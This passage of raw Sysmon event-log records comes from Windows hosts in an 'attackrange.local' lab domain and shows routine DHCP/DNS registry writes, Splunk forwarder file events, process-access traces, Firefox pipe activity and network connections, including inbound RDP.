Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7A9CE8E403033AC7DC64BAD3AC414B5,SHA256=E4068E447EB1CC6FF01BFD4655811410419006931EC71A2B301EA28D4865CFD6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001052957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpConnForceBroadcastFlagDWORD (0x00000000) 13241300x80000000000000001052956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\IsServerNapAwareDWORD (0x00000000) 13241300x80000000000000001052955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 
08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\AddressTypeDWORD (0x00000000) 13241300x80000000000000001052954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseTerminatesTimeDWORD (0x60ec0548) 13241300x80000000000000001052953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\T2DWORD (0x60ec0386) 13241300x80000000000000001052952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\T1DWORD (0x60ebfe40) 13241300x80000000000000001052951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseObtainedTimeDWORD (0x60ebf738) 13241300x80000000000000001052950Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\LeaseDWORD (0x00000e10) 
13241300x80000000000000001052949Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpServer10.0.1.1 13241300x80000000000000001052948Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpSubnetMask255.255.255.0 13241300x80000000000000001052947Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpIPAddress10.0.1.14 13241300x80000000000000001052946Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:04.973{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{5a71d2ff-5b40-4263-b1f4-8b3588283f4b}\DhcpInterfaceOptionsBinary Data 23542300x80000000000000001052945Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A69829D4D654E1740F781E0E95F3E002,SHA256=A125B61CF869E96A455EB8A4D1AF0B98463806A3FA9D36BEB54170448E281893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052944Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.511{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7E9BB51D9B1435F83D2C6BD739783CAB,SHA256=C85DA7AEDA1A8A0C59FE700192C8EB49EBDF2462B53A599246BDDD18278263D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809510Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:05.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64E714496D4EB7CC0AC186ABE1256525,SHA256=716B80D82B593CD9FC76BEEA28490BA0C123A274114A5986F15F08094479FEA9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.727{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-22438-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 354300x80000000000000001052959Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:56.644{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55075- 23542300x80000000000000001052958Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:04.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14FD66ACA2882A7CECB1122B9630C465,SHA256=36AEDA40905530DAD058B1AF36FCAA0BC0E0A82143A583F5A730CC87D27DE5F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809514Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.580{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C323C23A756A70E72731C1B79214817C,SHA256=7D50AA5AD86D40CE4B6CA35DD17BFB4914710D63897564C3A791D96C963D8B36,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052975Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052974Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052973Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052972Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:06.994{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.972{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:06.972{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001052969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.511{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:98c0:7b90:86bb:ffff-53248-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000001052968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.511{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local53248-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000001052967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:58.505{466BC892-02AF-60E8-1200-00000000CF01}400C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-890.attackrange.local68bootpcfalse10.0.1.1ip-10-0-1-1.eu-central-1.compute.internal67bootps 23542300x80000000000000001052966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:06.465{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.397{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001052964Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:03:06.397{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-53D9-60E8-E60F-00000000CF01}3924C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001052963Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:03:06.389{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.433.128717824C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001052962Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:03:06.389{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.433.128717824C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001052961Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:06.010{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33985BBB3B34B0D441853166A923B4CF,SHA256=61225EFA72B2079CC903BB6461A8418B90E249298E0B68AB6ACD73D7B189162C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809513Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809512Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809511Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:06.252{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000809516Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:07.596{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BCE1CE55BDECCA61E75E5E0E00CBF7,SHA256=02C59354D4312070E4C5B50A41543B489DE77BF09BEDCD6D4E6C177D42C85DA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001052992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:59.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51180-false10.0.1.12-8000- 734700x80000000000000001052991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:07.111{466BC892-F73A-60EB-C27D-00000000CF01}9972C:\Windows\System32\taskhostw.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 13241300x80000000000000001052990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\RegisteredSinceBootDWORD (0x00000001) 13241300x80000000000000001052989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\StaleAdapterDWORD (0x00000000) 
13241300x80000000000000001052988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\CompartmentIdDWORD (0x00000001) 13241300x80000000000000001052987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\FlagsDWORD (0x00000002) 13241300x80000000000000001052986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\TtlDWORD (0x000004b0) 13241300x80000000000000001052985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:03:07.025{466BC892-02AF-60E8-1300-00000000CF01}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Tcpip\Parameters\DNSRegisteredAdapters\{5A71D2FF-5B40-4263-B1F4-8B3588283F4B}\SentPriUpdateToIpBinary Data 